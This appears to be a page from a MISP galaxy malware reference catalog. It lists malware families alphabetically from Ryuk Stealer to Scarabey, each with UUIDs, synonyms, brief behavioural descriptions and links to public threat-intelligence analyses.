- https://thedfirreport.com/2021/01/31/bazar-no-ryuk/ - webarchive
- https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html - webarchive
- https://www.bankinfosecurity.com/blogs/akira-ransomware-apparently-in-decline-but-still-threat-p-3480 - webarchive
- https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2 - webarchive
- https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks - webarchive
- https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html - webarchive
- https://community.riskiq.com/article/0bcefe76 - webarchive
- https://arcticwolf.com/resources/blog/karakurt-web - webarchive
- https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware - webarchive
- https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf - webarchive
- https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html - webarchive
- https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/ - webarchive
- https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes - webarchive
- https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/ - webarchive
- https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/ - webarchive
- https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/ - webarchive
- https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html - webarchive
- https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets - webarchive
- https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/ - webarchive
- https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ - webarchive
- https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/ - webarchive
- https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion - webarchive
- https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware - webarchive
- https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html - webarchive
- https://medium.com/@shaddy43/from-infection-to-encryption-tracing-the-impact-of-ryuk-ransomware-64bd8656781c - webarchive
- https://blog.cyberint.com/ryuk-crypto-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ - webarchive
- https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/ - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html - webarchive
- https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - webarchive
- https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/ - webarchive
- https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021 - webarchive
- https://community.riskiq.com/article/c88cf7e6 - webarchive
- https://twitter.com/IntelAdvanced/status/1356114606780002308 - webarchive
- https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/ - webarchive
- https://www.youtube.com/watch?v=BhjQ6zsCVSc - webarchive
- https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/ - webarchive
- https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/ - webarchive
- https://www.youtube.com/watch?v=Of_KjNG9DHc - webarchive
- https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_SummitJohnHammond_Huntress_Analyzing_Ryuk.pdf - webarchive
- https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf - webarchive
- https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/ - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf - webarchive
- https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://unit42.paloaltonetworks.com/ryuk-ransomware/ - webarchive
- https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12 - webarchive
- https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf - webarchive
- https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/ - webarchive
- https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html - webarchive
- https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/ - webarchive
- https://thedfirreport.com/2020/10/08/ryuks-return/ - webarchive
- https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - webarchive
- https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/ - webarchive
- https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv - webarchive
- https://twitter.com/IntelAdvanced/status/1353546534676258816 - webarchive
- https://www.youtube.com/watch?v=CgDtm05qApE - webarchive
- https://www.scythe.io/library/threatthursday-ryuk - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-ulrick - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ryuk Stealer
Information Stealer that searches for sensitive documents and uploads its results to an FTP server. Skips files with known Ryuk extensions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ryuk Stealer.
Known Synonyms |
---|
Sidoh |
Internal MISP references
UUID 0f0e5355-1dbf-4af4-aebf-88b08e6272a4
which can be used as unique global reference for Ryuk Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer - webarchive
- https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/ - webarchive
- https://twitter.com/VK_Intel/status/1171782155581689858 - webarchive
- https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/ - webarchive
- https://analyst1.com/file-assets/Nationstate_ransomware_with_consecutive_endnotes.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sadogo
Ransomware.
Internal MISP references
UUID 188528f1-1292-4aaa-b1e6-3fe0ab78ff81
which can be used as unique global reference for Sadogo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Saefko
Internal MISP references
UUID 60124475-1c52-4108-81cf-7b9fa0f0d3bb
which can be used as unique global reference for Saefko
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SafeNet
Internal MISP references
UUID d16f9dc6-290d-4174-8b47-a972cc52dac7
which can be used as unique global reference for SafeNet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sagerunex
According to Symantec, Sagerunex is a backdoor that is fairly resilient and implements multiple forms of communication with its command-and-control (C&C) server. Its logs are encrypted; the encryption algorithm used is AES256-CBC, with the key derived from a hardcoded key using 8192 rounds of SHA256. It supports multiple methods for communicating via HTTP (proxy-aware).
Internal MISP references
UUID d8228309-ebf8-46fd-a968-bd9e24c498b4
which can be used as unique global reference for Sagerunex
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SAGE
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SAGE.
Known Synonyms |
---|
Saga |
Internal MISP references
UUID 56db8a46-a71b-4de1-a6b8-4312f78b8431
which can be used as unique global reference for SAGE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom - webarchive
- https://www.cert.pl/en/news/single/sage-2-0-analysis/ - webarchive
- https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga - webarchive
- http://malware-traffic-analysis.net/2017/10/13/index.html - webarchive
- https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SaiGon
FireEye reports SaiGon as a variant of ISFB v3 (the documented versions are tagged 3.50.132) that is more of a generic backdoor than a tool focused on enabling banking fraud.
Internal MISP references
UUID 08817c1e-3a90-4c9b-b332-52ebe72669c5
which can be used as unique global reference for SaiGon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Saint Bot
Internal MISP references
UUID aa0afca8-551e-4fc7-a314-f541b80c6833
which can be used as unique global reference for Saint Bot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot - webarchive
- https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive-into-saint-bot-downloader/ - webarchive
- https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/nascentursa/ - webarchive
- https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/ - webarchive
- https://www.cyberscoop.com/ukrainian-cyber-attacks-russia-conflict-q-and-a/ - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://cert.gov.ua/article/18419 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Saitama Backdoor
This backdoor, written in .NET, abuses the DNS protocol for its C2 communication. Other techniques (e.g. long random sleeps, compression) are also used to make it stealthier.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Saitama Backdoor.
Known Synonyms |
---|
AMATIAS |
Saitama |
Internal MISP references
UUID 435e482d-adfe-4b28-936e-d13fda800767
which can be used as unique global reference for Saitama Backdoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.saitama - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/ - webarchive
- https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html - webarchive
- https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html - webarchive
- https://www.fortinet.com/blog/threat-research/please-confirm-you-received-our-apt - webarchive
- https://isc.sans.edu/diary/Translating+Saitama%27s+DNS+tunneling+messages/28738 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sakula RAT
Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sakula RAT.
Known Synonyms |
---|
Sakurel |
Internal MISP references
UUID e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b
which can be used as unique global reference for Sakula RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.secureworks.com/research/sakula-malware-family - webarchive
- https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group - webarchive
- https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99 - webarchive
- https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/ - webarchive
- https://web.archive.org/web/20151001235506/https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=654 - webarchive
- https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1 - webarchive
- https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2022/05/unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Salgorea
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Salgorea.
Known Synonyms |
---|
BadCake |
Internal MISP references
UUID 060ff141-bb68-47ca-8a9d-8722f1edaa6e
which can be used as unique global reference for Salgorea
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf - webarchive
- https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware - webarchive
- https://research.checkpoint.com/deobfuscating-apt32-flow-graphs-with-cutter-and-radare2/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sality
F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.
Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.
Infection
Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.
Earlier Sality variants were regarded as technically sophisticated in that they used an Entry Point Obscuration (EPO) technique to hide their presence on the system. With this technique the virus inserts a command somewhere in the middle of an infected file's code, so that when the system reads the file to execute it and reaches that command, execution 'jumps' to the malware's code, which runs instead. This technique was used to make discovery and disinfection of the malicious code harder.
Payload
Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
Internal MISP references
UUID cf752563-ad8a-4286-b2b3-9acf24a0a09a
which can be used as unique global reference for Sality
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sality - webarchive
- https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf - webarchive
- https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py - webarchive
- https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail - webarchive
- https://unit42.paloaltonetworks.com/c2-traffic/ - webarchive
- https://www.mandiant.com/resources/pe-file-infecting-malware-ot - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SamoRAT
According to PCrisk, SamoRAT is a Remote Access Trojan (RAT), a type of malware that allows the cyber criminals responsible to monitor and control the infected computer. In most cases, RATs are used to steal sensitive information and/or install other malware onto the infected computer.
Internal MISP references
UUID e2db8349-7535-4748-96ac-a18985cf66b8
which can be used as unique global reference for SamoRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SamSam
According to PCrisk, Samsam is high-risk ransomware designed to infect unpatched servers and encrypt files stored on computers networked to the infected server.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SamSam.
Known Synonyms |
---|
Samas |
Internal MISP references
UUID 696d78cb-1716-4ca0-b678-c03c7cfec19a
which can be used as unique global reference for SamSam
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam - webarchive
- https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/ - webarchive
- https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/ - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/ - webarchive
- https://www.secureworks.com/blog/samas-ransomware - webarchive
- https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/ - webarchive
- https://www.secureworks.com/research/samsam-ransomware-campaigns - webarchive
- https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/ - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx - webarchive
- http://blog.talosintel.com/2016/03/samsam-ransomware.html - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1 - webarchive
- http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html - webarchive
- https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://www.secureworks.com/blog/ransomware-deployed-by-adversary - webarchive
- https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public - webarchive
- https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-lowell - webarchive
- https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/ - webarchive
- https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit - webarchive
- https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/ - webarchive
- https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/ - webarchive
- https://www.justice.gov/opa/press-release/file/1114746/download - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sanny
Internal MISP references
UUID 34c6504b-e947-49d8-a963-62b7594b7ef9
which can be used as unique global reference for Sanny
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SapphireMiner
Internal MISP references
UUID 32e9c2ce-08a6-47ee-8636-ea83711930b1
which can be used as unique global reference for SapphireMiner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SapphireStealer
Internal MISP references
UUID e1b2b792-033a-438d-a9c4-4d2adf1abb43
which can be used as unique global reference for SapphireStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SappyCache
Internal MISP references
UUID 056eca1f-4195-48c3-81d8-ed554dd1de20
which can be used as unique global reference for SappyCache
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache - webarchive
- https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails - webarchive
- https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html - webarchive
- https://blog.alyac.co.kr/2219 - webarchive
- https://blog.alyac.co.kr/m/2219 - webarchive
- https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sarhust
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sarhust.
Known Synonyms |
---|
ENDCMD |
Hussarini |
Internal MISP references
UUID 5aed5403-9c52-4de6-9c8d-d29e5197ef7e
which can be used as unique global reference for Sarhust
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust - webarchive
- https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt - webarchive
- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a - webarchive
- https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sasfis
Sasfis acts mostly as a downloader that has been observed to download Asprox and FakeAV. According to a VirusBulletin article from 2012, it is likely authored by the same group as SmokeLoader.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sasfis.
Known Synonyms |
---|
Oficla |
Internal MISP references
UUID 4c4ceb45-b326-45aa-8f1a-1229e90c78b4
which can be used as unique global reference for Sasfis
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis - webarchive
- https://www.symantec.com/security-center/writeup/2010-020210-5440-99 - webarchive
- https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign - webarchive
- https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/ - webarchive
- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis - webarchive
- https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Sasfis-O/detailed-analysis.aspx - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Satacom
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Satacom.
Known Synonyms |
---|
LegionLoader |
Internal MISP references
UUID b08af3b5-2453-4d4b-972a-32e6602410f2
which can be used as unique global reference for Satacom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Satan
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Satan.
Known Synonyms |
---|
5ss5c |
DBGer |
Lucky Ransomware |
Internal MISP references
UUID 5639f7db-ab70-4b86-8a2f-9c4e3927ba91
which can be used as unique global reference for Satan
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.satan - webarchive
- https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html - webarchive
- https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2 - webarchive
- https://www.sangfor.com/source/blog-network-security/1094.html - webarchive
- https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/ - webarchive
- https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/ - webarchive
- http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/ - webarchive
- https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread - webarchive
- https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Satana
According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer’s master boot record (MBR) and prevents it from starting.
Internal MISP references
UUID 09b555be-8bac-44b2-8741-922ee0b87880
which can be used as unique global reference for Satana
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Satellite Turla
Internal MISP references
UUID 957f6c4a-c750-4ba3-820f-5a19d444a57a
which can be used as unique global reference for Satellite Turla
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla - webarchive
- https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/ - webarchive
- https://nsarchive.gwu.edu/sites/default/files/documents/3921357/Government-of-Canada-Hackers-are-Humans-Too.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sathurbot
Internal MISP references
UUID bdc7cc9c-c46d-4f77-b903-2335cc1a3369
which can be used as unique global reference for Sathurbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot - webarchive
- https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ScanLine
According to CISA, this is a command-line port scanning utility from Foundstone. It is used to scan for open UDP and TCP ports, grab banners from open ports, resolve IP addresses to host names, and bind to specified ports and IP addresses.
Internal MISP references
UUID 56d01dfe-6f23-4f76-9fa3-e30e514b8f7f
which can be used as unique global reference for ScanLine
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Scano
Internal MISP references
UUID cf619d43-0c69-4644-bcd9-e76ceb7c0d88
which can be used as unique global reference for Scano
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ScanPOS
Internal MISP references
UUID e3adbb0d-6d6e-4686-8108-ee76452339bf
which can be used as unique global reference for ScanPOS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos - webarchive
- https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware - webarchive
- https://securitykitten.github.io/2016/11/15/scanpos.html - webarchive
- https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-11-15-scanpos.md - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Scarabey
Ransomware with a ransom note in Russian and the encryption extension .scarab.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Scarabey.
Known Synonyms |
---|
MVP |
Scarab |
Scarab-Russian |
Internal MISP references
UUID 76d20f49-9367-4d36-95d2-7ef8ff55568d
which can be used as unique global reference for Scarabey
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
